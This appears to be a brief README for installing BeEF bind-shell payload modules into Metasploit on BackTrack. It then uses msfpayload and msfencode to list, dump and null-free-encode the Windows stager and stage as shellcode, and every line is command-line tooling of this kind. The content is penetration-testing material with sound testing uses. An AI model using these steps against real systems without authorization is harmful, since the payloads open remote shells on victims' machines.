38 lines
1.2 KiB
Plaintext
38 lines
1.2 KiB
Plaintext
|
|
Install into Metasploit on BackTrack:
|
|
|
|
cp beef_bind-handler.rb /pentest/exploits/framework3/lib/msf/core/handler/beef_bind.rb
|
|
cp beef_bind-stage-windows-x86.rb /pentest/exploits/framework3/modules/payloads/stages/windows/beef_shell.rb
|
|
cp beef_bind-stager-windows-x86.rb /pentest/exploits/framework3/modules/payloads/stagers/windows/beef_bind.rb
|
|
cp beef_bind-stage-linux-x86.rb /pentest/exploits/framework3/modules/payloads/stages/linux/x86/beef_shell.rb
|
|
cp beef_bind-stager-linux-x86.rb /pentest/exploits/framework3/modules/payloads/stagers/linux/x86/beef_bind.rb
|
|
cp beef_bind-stage-linux-x64.rb /pentest/exploits/framework3/modules/payloads/stages/linux/x64/beef_shell.rb
|
|
cp beef_bind-stager-linux-x64.rb /pentest/exploits/framework3/modules/payloads/stagers/linux/x64/beef_bind.rb
|
|
|
|
Check it works:
|
|
|
|
msfpayload -l | grep beef_bind
|
|
|
|
|
|
Get info on the payload:
|
|
|
|
msfpayload windows/beef_shell/beef_bind S
|
|
|
|
|
|
Dump stager and stage in C format:
|
|
|
|
msfpayload windows/beef_shell/beef_bind C
|
|
|
|
|
|
Dump stager in raw format:
|
|
|
|
msfpayload windows/beef_shell/beef_bind R > beef_bind-stager
|
|
|
|
|
|
Encode stager to remove nulls:
|
|
|
|
msfpayload windows/beef_shell/beef_bind R | msfencode -b '\x00'
|
|
|
|
|
|
|